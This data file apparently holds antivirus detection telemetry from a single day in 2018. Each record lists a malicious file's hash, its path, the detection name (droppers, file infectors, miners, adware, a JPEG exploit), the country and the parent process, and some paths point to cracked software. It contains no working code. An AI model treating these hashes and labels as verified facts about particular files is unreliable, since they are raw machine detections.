  Row(detection=Row(filename='xuetr.exe', filepath='H:\\HBCD\\Programs\\XueTr.exe', filesize=64000, name='TR/Siggen.64000.12.#M1.#R1'), hash='01bb8e327211e5fff9594e791c0abb322f765b94a3d0400e7eec9dad68e3310e', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083031-b0318179', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-083031-B0318179', filesize=64000, name='TR/Siggen.64000.12.#M1.#R1'), hash='01bb8e327211e5fff9594e791c0abb322f765b94a3d0400e7eec9dad68e3310e', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xuetr.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\XueTr.exe", filesize=64000, name='TR/Siggen.64000.12.#M1.#R1'), hash='01bb8e327211e5fff9594e791c0abb322f765b94a3d0400e7eec9dad68e3310e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101932-9b05f944', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101904-971CB8F7\\AVSCAN-20181102-101932-9B05F944', filesize=64000, name='TR/Siggen.64000.12.#M1.#R1'), hash='01bb8e327211e5fff9594e791c0abb322f765b94a3d0400e7eec9dad68e3310e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:19:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1_11_7_5.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\1_11_7_5.html', filesize=220000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='01f7693035cdb7d935a14a2f03175b764cd7742ab1331f15b62092c2476e3f74', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T12:14:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-040416-8def01f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-040416-8DEF01F9', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='022930c8f85f06da2c609e61bac2f11a5108c263d590fcb0996ffc0d8fc3ed1e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:06:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='19780a1f.vbt', filepath='C:\\Program Files\\Spyware Doctor\\avdb\\temp\\19780A1F.vbt', filesize=2048000, name='TR/Crypt.XPACK.Gen.#M300.#R3174'), hash='02336aab184a9fb445de08399fd4d3d06628bf43471242143768393271534cb0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Spyware Doctor\\pctsSvc.exe', parentsize=1095560, timestamp='2018-11-02T17:30:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='extras.htm', filepath='C:\\Program Files (x86)\\Corel\\CorelDRAW Graphics Suite X4\\Setup\\Lang\\BR\\Custom\\Extras.htm', filesize=236000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='0238ace1edf773dd507360e72dc00d65dd8edc658a12c3a3b0ec5401af8f8c4d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-02T01:47:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered cemec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered cemec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='0268017b9975cb13801f4f2b1abf5421e24188536126b282a96411a6f92f02ae', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:02:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='start.exe', filepath='\\\\n5550\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\行銷管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='02da631777a3c2ca2d33853a06269f788e1d027e6de8e640798721363d6ffd6c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:1upUepgZNU2jR\\\\\\/+9.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:02:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0c17335b378c7ebed353d99e40cca532cde33076', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\0c17335b378c7ebed353d99e40cca532cde33076', filesize=196000, name='PUA/InstallCore.Gen2.#M1.#R1'), hash='03074ae84126999407eb454686c174cf93648dd3c1c27522a694ff83c2b0ac8b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:25:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0c17335b378c7ebed353d99e40cca532cde33076', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\0c17335b378c7ebed353d99e40cca532cde33076', filesize=196000, name='PUA/InstallCore.#M1.#R1'), hash='03074ae84126999407eb454686c174cf93648dd3c1c27522a694ff83c2b0ac8b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:36:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{C6E639E3-12B6-4CA3-BE05-00E533F97068}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='03bb807416637190950ce5e22b75847cdb92bb46d52eefe66bdcc5e34261f60e', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:42:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hp1005sm.exe', filepath='C:\\WINDOWS\\system32\\spool\\drivers\\w32x86\\3\\HP1005SM.EXE', filesize=256000, name='W32/Sality.AT.#M0.#R0'), hash='03f0cccec3f36720a678078fca7cd6f794ff06061362c7807d59893e9c40d7a3', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a190_calc.exe', filepath='c:\\users\\X\\documents\\ansys 19.0\\ansys 19.0\\crack\\a190_calc.exe', filesize=768000, name='HEUR/APC.#M1.#R1'), hash='04239a5a53d71e87acf2a3ae5873657ccbbbd8fd6e6c39562ccaa8fe2859b7dd', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T11:16:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-121748-6781bd5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_07226c0d\\AVSCAN-20181102-121652-605C135C\\AVSCAN-20181102-121748-6781BD5D', filesize=768000, name='HEUR/APC.#M1.#R1'), hash='04239a5a53d71e87acf2a3ae5873657ccbbbd8fd6e6c39562ccaa8fe2859b7dd', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:17:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140310-989d7968', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9c5347db\\AVSCAN-20181102-135921-83530A66\\AVSCAN-20181102-140310-989D7968', filesize=3420000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='043c093bb240921744cb23205229e70e67de05261e76bfa4a044fdb497d69336', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:03:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3420000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='043c093bb240921744cb23205229e70e67de05261e76bfa4a044fdb497d69336', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:58:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='056cb4da505aa394f91880842a3caceb1501d925d730cb573b524a1fe6ff994c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-24.categorizing\\056CB4DA505AA394F91880842A3CACEB1501D925D730CB573B524A1FE6FF994C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='056cb4da505aa394f91880842a3caceb1501d925d730cb573b524a1fe6ff994c', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-02T10:14:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='056cb4da505aa394f91880842a3caceb1501d925d730cb573b524a1fe6ff994c', filepath='C:\\Users\\X\\Downloads\\t\\ D_\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-24\\056CB4DA505AA394F91880842A3CACEB1501D925D730CB573B524A1FE6FF994C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='056cb4da505aa394f91880842a3caceb1501d925d730cb573b524a1fe6ff994c', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-26.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-24.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-25.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T06:35:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='far cry primal v1.3.3 plus +15 trainer.exe', filepath='F:\\Far Cry Primal v1.3.3 Plus +15 Trainer (ใช้ได้)\\Far Cry Primal v1.3.3 Plus +15 Trainer.exe', filesize=4856000, name='HEUR/AGEN.1033989.#M1.#R1'), hash='05da284eecf14e3b72ff9f84102b0370fd71cb0d93dbf3aea2d78801b4863c1d', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\FutureXGame\\Far Cry Primal Trainer.exe', parentsize=3166208, timestamp='2018-11-02T14:52:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-215453-0eae0523', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_49270d97\\AVSCAN-20181102-215416-0A2862AA\\AVSCAN-20181102-215453-0EAE0523', filesize=4856000, name='HEUR/AGEN.1033989.#M1.#R1'), hash='05da284eecf14e3b72ff9f84102b0370fd71cb0d93dbf3aea2d78801b4863c1d', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:55:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='i2owb436.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Low\\i2owb436.exe', filesize=128000, name='HEUR/AGEN.1031358.#M1.#R1'), hash='05ef2a5ba87cf6744258137434f14566712d632c88c70e00fa161eb1bd5a7de8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:06:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='05fc403cfe21604b31ad3a635209320126c73c7986ba605c8d8f081b0cbc781e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.available\\Avira\\05FC403CFE21604B31AD3A635209320126C73C7986BA605C8D8F081B0CBC781E', filesize=180000, name='W32/Elkern.B.#M1.#R1'), hash='05fc403cfe21604b31ad3a635209320126c73c7986ba605c8d8f081b0cbc781e', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T11:03:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='05fc403cfe21604b31ad3a635209320126c73c7986ba605c8d8f081b0cbc781e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.available\\Avira\\05FC403CFE21604B31AD3A635209320126C73C7986BA605C8D8F081B0CBC781E', filesize=180000, name='W32/Elkern.B.#M1.#R1'), hash='05fc403cfe21604b31ad3a635209320126c73c7986ba605c8d8f081b0cbc781e', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:49:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kmpct2km.exe', filepath='e:\\new folder\\kxdriver_ccd_clp_20141029\\kxdriver\\utility\\configtool\\KMPCT2KM.exe', filesize=832000, name='W32/Neshta.A.#M1.#R1'), hash='06455a0a9b2a3090e178a2be8d104349675c82e48a1ab7a3d78bf70645c0fd8c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:35:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='06611cc1cfe01e4d3cb6067e59287aae15876ebcd1dfd575bd5fcc5e652b86da', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\06611CC1CFE01E4D3CB6067E59287AAE15876EBCD1DFD575BD5FCC5E652B86DA', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='06611cc1cfe01e4d3cb6067e59287aae15876ebcd1dfd575bd5fcc5e652b86da', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:22:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\OneDrive\\LAB\\A\\MITSUBISHI LUCIANO\\OUTLANDER\\OUTLANDER 4X2\\2011MY EUR OUTLANDER WM\\TOOL\\MSV\\ENV\\MSVE\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='067a9461e1b8e7f004aa4eb6bcb608af91735b9e1f860c09ef19ae487b31e48a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe48_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe48 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:07:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='06a2488d06c173ab33f005a42f3213148694c90b2ae97ee2411d2ddd3043840b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\06A2488D06C173AB33F005A42F3213148694C90B2AE97EE2411D2DDD3043840B', filesize=768000, name='PUA/SoftPulse.aonb.#M1.#R1'), hash='06a2488d06c173ab33f005a42f3213148694c90b2ae97ee2411d2ddd3043840b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:12:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='06bb2f3f4067b24380e3d984a75ed522ea72e0faf16425d0bb64bb127464322b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\06BB2F3F4067B24380E3D984A75ED522EA72E0FAF16425D0BB64BB127464322B', filesize=64000, name='TR/Dropper.Gen.#M300.#R3497'), hash='06bb2f3f4067b24380e3d984a75ed522ea72e0faf16425d0bb64bb127464322b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:45:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='06bb2f3f4067b24380e3d984a75ed522ea72e0faf16425d0bb64bb127464322b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\06BB2F3F4067B24380E3D984A75ED522EA72E0FAF16425D0BB64BB127464322B', filesize=64000, name='TR/Dropper.Gen.#M300.#R3497'), hash='06bb2f3f4067b24380e3d984a75ed522ea72e0faf16425d0bb64bb127464322b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T09:39:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='06bb2f3f4067b24380e3d984a75ed522ea72e0faf16425d0bb64bb127464322b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\06BB2F3F4067B24380E3D984A75ED522EA72E0FAF16425D0BB64BB127464322B', filesize=64000, name='TR/Dropper.Gen.#M300.#R3497'), hash='06bb2f3f4067b24380e3d984a75ed522ea72e0faf16425d0bb64bb127464322b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:06:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='06c59d22d87b82286e1fde0ebf429444d3f190e5d1bac53b199aa7d96e9b1b99', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\06C59D22D87B82286E1FDE0EBF429444D3F190E5D1BAC53B199AA7D96E9B1B99', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='06c59d22d87b82286e1fde0ebf429444d3f190e5d1bac53b199aa7d96e9b1b99', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:20:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='06c59d22d87b82286e1fde0ebf429444d3f190e5d1bac53b199aa7d96e9b1b99', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\06C59D22D87B82286E1FDE0EBF429444D3F190E5D1BAC53B199AA7D96E9B1B99', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='06c59d22d87b82286e1fde0ebf429444d3f190e5d1bac53b199aa7d96e9b1b99', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:56:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='06c59d22d87b82286e1fde0ebf429444d3f190e5d1bac53b199aa7d96e9b1b99', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\06C59D22D87B82286E1FDE0EBF429444D3F190E5D1BAC53B199AA7D96E9B1B99', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='06c59d22d87b82286e1fde0ebf429444d3f190e5d1bac53b199aa7d96e9b1b99', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:14:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='scvhost.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\Update\\scvhost.exe', filesize=448000, name='APPL/BitCoinMiner.5.12.#M1.#R1'), hash='06c5e86be6dca55eda888cd820a30394eba9b9b69d2887f3d652a139ae00c371', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:54:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T19:48:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T16:27:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T13:00:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T08:53:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T14:07:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T17:47:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T09:57:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T15:25:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T18:48:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T20:55:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='96b8b4ae05e271ced86574bc82205fb579e573e3', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\96b8b4ae05e271ced86574bc82205fb579e573e3', filesize=2112000, name='ADWARE/DealPly.Gen.#M1.#R1'), hash='0779a49a14dee81c178e8dd585b31ce7e83f1593b664132aa48c905a204be939', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:31:00Z'), dt=datetime.date(2018, 11, 2)),
